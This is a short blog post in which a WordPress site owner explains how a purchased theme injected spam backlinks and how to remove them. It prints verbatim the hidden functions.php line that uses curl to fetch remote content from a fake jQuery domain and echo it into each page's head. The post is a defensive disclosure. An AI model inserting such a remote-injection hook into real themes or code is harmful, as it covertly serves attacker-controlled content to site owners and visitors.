WordPress Hacked: Spam BackLinks

As you may recall, I switched my WordPress theme two months ago , and installed a new theme called PixelPower. If you read my previous post, I had disabled W3 Total Cache Minify and replaced with Better WordPress Minify.

So after successfully implementing the W3 Total Cache minify on another blog I decided to give mine a second chance; the problem I found was that it takes a few seconds for W3TC to write it to disk, and my Amazon CloudFront gets a 404 the first time it tries to hit it … After a second attempt it seems to be working fine.

To my surprise however, while debugging and looking at my html source code I noticed something unusual - WordPress Hacked! a bunch of links were injected pointing to care2.com! So I did a little digging and I found that it was a big problem with jquery being injected by wpstats.org. Not my case, but I did find the problem. Open your functions.php file and if the 2nd line reads:

if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=“http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);} Then your theme will automatically add spam backlinks… What annoys me the most is that I only found out now, after two months with the new template. So if you buy WordPress themes, especially from an unknown source - beware of sneaky spam links added to the original theme.

I deleted said line and all the backlinks disappeared.